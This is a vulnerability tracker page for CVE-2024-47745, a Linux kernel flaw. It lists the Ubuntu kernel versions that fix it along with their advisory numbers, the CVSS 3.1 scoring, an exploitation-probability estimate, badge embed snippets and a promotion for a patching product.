Fixed in:6.8.0-54.56.1USN-7301-1
linux-lowlatency-hwe-6.8Ubuntu
Fixed in:6.8.0-54.56.1~22.04.1USN-7301-1
linux-nvidiaUbuntu
Fixed in:6.8.0-1022.25USN-7303-1
linux-nvidia-6.8Ubuntu
Fixed in:6.8.0-1022.25~22.04.2USN-7303-1
linux-nvidia-lowlatencyUbuntu
Fixed in:6.8.0-1022.25.2USN-7303-1
linux-oem-6.11Ubuntu
Fixed in:6.11.0-1015.15USN-7310-1
linux-oem-6.8Ubuntu
Fixed in:6.8.0-1024.24USN-7386-1
linux-oracleUbuntu
Fixed in:6.8.0-1020.21USN-7303-2
linux-oracle-6.8Ubuntu
Fixed in:6.8.0-1020.21~22.04.1USN-7303-2
linux-raspiUbuntu
Fixed in:6.8.0-1019.23USN-7303-3

Remediation is compiled from vendor and distribution security advisories. Always confirm against the linked source for your exact version and platform.

CVSS v3 Vector

Exploitability

Attack VectorLocal
Attack ComplexityLow
Privileges RequiredLow
User InteractionNone
ScopeUnchanged

Impact

ConfidentialityHigh
IntegrityHigh
AvailabilityHigh

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Exploit Intelligence

0.28%probability of exploitation in 30 days
20thpercentile

Low risk: more likely to be exploited than 20% of all known CVEs.

References

Embed a live status badge for CVE-2024-47745
CVE-2024-47745 severity badge

Markdown

[![CVE-2024-47745](https://tridentstack.com/cve/badge/CVE-2024-47745.svg)](https://tridentstack.com/cve/CVE-2024-47745)

HTML

<a href="https://tridentstack.com/cve/CVE-2024-47745"><img src="https://tridentstack.com/cve/badge/CVE-2024-47745.svg" alt="CVE-2024-47745"></a>

Find and fix vulnerabilities across your fleet

TridentStack Control continuously scans your Windows, macOS, and Linux fleet for known vulnerabilities, prioritizes them by severity and active exploitation, and patches them automatically.

Start free

This product uses NVD data but is not endorsed or certified by the NVD. EPSS scores courtesy of FIRST.org (https://www.first.org/epss). Source: CISA KEV Catalog. Data as of 2026-05-12.